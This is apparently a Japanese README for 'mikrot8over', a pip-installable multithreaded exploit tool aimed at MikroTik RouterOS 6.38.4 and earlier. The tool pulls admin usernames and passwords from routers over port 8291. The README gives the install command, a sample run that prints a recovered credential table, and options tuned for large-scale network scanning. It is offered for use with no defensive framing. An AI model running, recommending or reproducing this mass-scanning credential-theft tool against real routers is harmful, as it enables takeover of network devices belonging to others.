
mikrot8over: バージョン6.38.4までのMikrotik RouterOS向け高速エクスプロイトツール
mikrot8over: Mikrotik RouterOS 6.38.4 以下向け高速エクスプロイトツール
これは元の Mikrotik Exploit を再構成したものです。 Python 2 互換性とマルチスレッドスキャン機能を追加しました。
本ユーティリティは python2.6、python2.7、python3.* でテスト済みです。 バグを発見した場合は、遠慮なく issue を開いてください。
pip install mikrot8over
# pip install mikrot8over
# mikrot8over 127.0.0.1
Starting scan for IP 127.0.0.1, port 8291 running in 10 threads
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 3379.78it/s]
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
| IP | Login | Password |
+======================+================================+======================================================================================================+
127.0.0.1 admin admin
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
大規模ネットワークスキャン向けに、最大スレッド数とソケットタイムアウトを設定できます。
# pip install mikrot8over
# mikrot8over --help
Usage:
Mikrotik exploit from Vault 7 CIA Leaks automation tool
Takeovers up to RouterOS 6.38.4.
Usage: mikrot8over IP_ADDRESS
Options:
-h, --help show this help message and exit
-p PORT, --port=PORT List of the port to scan. Default is 8291
-t THREADS, --threads=THREADS
Number of scan threads. Default is 10 that fits the
most of systems
-o TIMEOUT, --timeout=TIMEOUT
Socket connection timeout```